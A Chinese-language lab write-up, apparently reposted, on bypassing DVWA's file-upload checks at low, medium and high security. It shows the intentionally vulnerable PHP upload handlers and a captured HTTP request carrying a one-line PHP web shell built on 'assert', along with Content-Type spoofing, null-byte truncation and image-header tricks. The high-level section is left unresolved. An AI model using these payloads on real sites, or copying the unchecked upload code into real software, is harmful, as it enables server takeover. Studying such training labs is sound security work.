当前位置:首页>视频 > 上传工具 > dwa_DWVA上传漏洞挖掘的测试例子

dwa_DWVA上传漏洞挖掘的测试例子

更新时间:2020-04-06    来源:上传工具    手机版     字体:

【www.bbyears.com--上传工具】

low:

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ "uploaded" ][ "tmp_name" ], $target_path ) ) {
        // No
        echo "

Your image was not uploaded.
";
    }
    else {
        // Yes!
        echo "
{$target_path} succesfully uploaded!
";
    }
}

?>
没有对文件类型进行限制,直接将php文件上传,之后访问:http://localhost/hackable/uploads/XX.php即可。

medium:

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // File information
    $uploaded_name = $_FILES[ "uploaded" ][ "name" ];
    $uploaded_type = $_FILES[ "uploaded" ][ "type" ];
    $uploaded_size = $_FILES[ "uploaded" ][ "size" ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ "uploaded" ][ "tmp_name" ], $target_path ) ) {
            // No
            echo "

Your image was not uploaded.
";
        }
        else {
            // Yes!
            echo "
{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo "
Your image was not uploaded. We can only accept JPEG or PNG images.
";
    }
}

?>
对上传的文件进行限制。
解决方法1:用burp suite进行00截断,将文件名改为1.php .jpg(注意中间有空格)然后在拦截中将空格改为00。
解决方法2:直接上传2.php文件之后进行拦截,数据包如下


POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

$item["wind"] = "assert";

$array[] = $item;

$array[0]["wind"]($_POST["loveautumn"]);

?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
将红色的部分修改成:Content-Type: image/jpeg即可绕过。


High:

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // File information
    $uploaded_name = $_FILES[ "uploaded" ][ "name" ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, "." ) + 1);
    $uploaded_size = $_FILES[ "uploaded" ][ "size" ];
    $uploaded_tmp  = $_FILES[ "uploaded" ][ "tmp_name" ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo "

Your image was not uploaded.
";
        }
        else {
            // Yes!
            echo "
{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo "
Your image was not uploaded. We can only accept JPEG or PNG images.
";
    }
}

?>
对图片的命名和类型进行了严格的限制,那么可以用文件头欺骗的方式来解决这个问题。另外,假设文件名为1.php.png,strrpos会截取.出现的最后位置是5,之后substr从第六位开始重新命名文件名,也就是最终上传的文件名会被改成png,会被拦截掉。
首先使用记事本对正常图片文件编辑,将php一句话代码写到图片最下面,保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传,用burpsuite拦截:
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"的话可以获得一个x00.php .png文件,这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案,可能是上传一个含有一句话的jpg文件之后采用文件包含来完成?暂时存疑

本文来源:http://www.bbyears.com/shipin/92200.html

上一篇 下一篇

猜你感兴趣

热门标签

更多>>
dwan dwade dwa算法

本类排行

本网站版权归作者所有,如果无意之中侵犯了您的版权,请邮件告知或通知网站客服,本站将在3个工作日内删除。

Copyright © 2007-2019 程序开发教程网 All rights reserved. 程序开发教程网 京ICP备17136666号